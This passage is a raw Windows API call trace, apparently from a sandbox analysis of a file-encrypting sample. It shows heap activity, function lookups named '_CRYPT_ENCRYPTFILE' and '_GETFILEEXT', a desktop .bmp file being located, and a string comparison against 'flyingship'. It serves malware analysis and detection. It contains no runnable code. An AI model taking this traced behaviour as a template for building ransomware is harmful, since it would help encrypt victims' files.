RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0164.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0164.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0164.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0164.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0164.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0164.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0164.866] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0164.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0164.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0164.866] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0164.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9fb8 [0164.866] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9b9fb8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0164.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0164.866] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0164.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0164.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0164.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0164.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0164.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0164.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0164.866] CloseHandle (hObject=0x120) returned 1 [0164.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0164.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0164.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0164.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0164.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0164.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0164.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0164.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0164.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0164.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0164.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0164.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0164.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0164.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0164.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0164.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0164.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0164.867] FreeLibrary (hLibModule=0x75990000) returned 1 [0164.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0164.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0164.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0164.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0164.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0164.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0164.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0164.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0164.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0164.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0164.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0164.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0164.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0164.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0164.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0164.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0164.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0164.868] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0164.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0164.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0164.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0164.868] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0164.868] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0164.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0164.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0164.869] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0164.869] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0164.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0164.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0164.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0164.869] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0164.869] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0164.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0164.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0164.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0164.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0164.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0164.869] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0164.869] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0164.869] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0164.869] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0164.869] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0164.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0164.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0164.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0164.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0164.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0164.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0164.901] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0164.901] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0164.902] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\SEObOseiAS.bmp", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ee78cb0, ftCreationTime.dwHighDateTime=0x1d5d815, ftLastAccessTime.dwLowDateTime=0x3a5f2470, ftLastAccessTime.dwHighDateTime=0x1d5e4f2, ftLastWriteTime.dwLowDateTime=0x3a5f2470, ftLastWriteTime.dwHighDateTime=0x1d5e4f2, nFileSizeHigh=0x0, nFileSizeLow=0x53cf, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="SEObOseiAS.bmp", cAlternateFileName="SEOBOS~1.BMP")) returned 0x90add8 [0164.903] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0164.903] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0164.903] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\SEObOseiAS.bmp", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ee78cb0, ftCreationTime.dwHighDateTime=0x1d5d815, ftLastAccessTime.dwLowDateTime=0x3a5f2470, ftLastAccessTime.dwHighDateTime=0x1d5e4f2, ftLastWriteTime.dwLowDateTime=0x3a5f2470, ftLastWriteTime.dwHighDateTime=0x1d5e4f2, nFileSizeHigh=0x0, nFileSizeLow=0x53cf, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="SEObOseiAS.bmp", cAlternateFileName="SEOBOS~1.BMP")) returned 0x90add8 [0164.904] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0164.904] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0164.904] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\SEObOseiAS.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.904] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\SEObOseiAS.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.904] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\SEObOseiAS.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.904] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\SEObOseiAS.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.904] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\SEObOseiAS.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.904] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\SEObOseiAS.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.904] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\SEObOseiAS.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.904] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\SEObOseiAS.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.904] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\SEObOseiAS.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.904] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\SEObOseiAS.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.904] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\SEObOseiAS.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.904] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\SEObOseiAS.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.904] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\SEObOseiAS.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.905] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\SEObOseiAS.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.905] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\SEObOseiAS.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.905] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\SEObOseiAS.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.905] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\SEObOseiAS.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.905] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\SEObOseiAS.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.905] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\SEObOseiAS.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.905] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\SEObOseiAS.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.905] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\SEObOseiAS.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.905] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\SEObOseiAS.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.905] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\SEObOseiAS.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.905] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\SEObOseiAS.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.905] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\SEObOseiAS.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.905] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\NA3pEcvaltBR8VLK\\SEObOseiAS.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.905] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\NA3pEcvaltBR8VLK\\SEObOseiAS.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.905] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\NA3pEcvaltBR8VLK\\SEObOseiAS.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.905] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\NA3pEcvaltBR8VLK\\SEObOseiAS.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.905] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\NA3pEcvaltBR8VLK\\SEObOseiAS.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.905] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\NA3pEcvaltBR8VLK\\SEObOseiAS.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.905] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\NA3pEcvaltBR8VLK\\SEObOseiAS.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.905] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\NA3pEcvaltBR8VLK\\SEObOseiAS.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.905] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\NA3pEcvaltBR8VLK\\SEObOseiAS.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.905] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\NA3pEcvaltBR8VLK\\SEObOseiAS.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.905] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\NA3pEcvaltBR8VLK\\SEObOseiAS.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.906] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\NA3pEcvaltBR8VLK\\SEObOseiAS.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.906] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\NA3pEcvaltBR8VLK\\SEObOseiAS.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.906] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\NA3pEcvaltBR8VLK\\SEObOseiAS.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.906] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NA3pEcvaltBR8VLK\\SEObOseiAS.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.906] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="A3pEcvaltBR8VLK\\SEObOseiAS.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.906] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3pEcvaltBR8VLK\\SEObOseiAS.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.906] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pEcvaltBR8VLK\\SEObOseiAS.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.906] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EcvaltBR8VLK\\SEObOseiAS.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.906] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cvaltBR8VLK\\SEObOseiAS.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.906] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="valtBR8VLK\\SEObOseiAS.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.906] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="altBR8VLK\\SEObOseiAS.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.906] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ltBR8VLK\\SEObOseiAS.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.906] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tBR8VLK\\SEObOseiAS.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.906] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BR8VLK\\SEObOseiAS.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.906] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="R8VLK\\SEObOseiAS.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.906] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8VLK\\SEObOseiAS.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.906] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VLK\\SEObOseiAS.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.906] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LK\\SEObOseiAS.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.906] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K\\SEObOseiAS.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.906] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\SEObOseiAS.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.906] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEObOseiAS.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.906] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EObOseiAS.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.906] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ObOseiAS.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.906] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bOseiAS.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.906] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OseiAS.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.907] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="seiAS.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.907] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0164.907] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0164.907] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0164.907] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0164.907] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0164.907] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0164.907] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0164.907] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0164.907] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0164.907] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0164.907] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0164.907] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0164.907] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 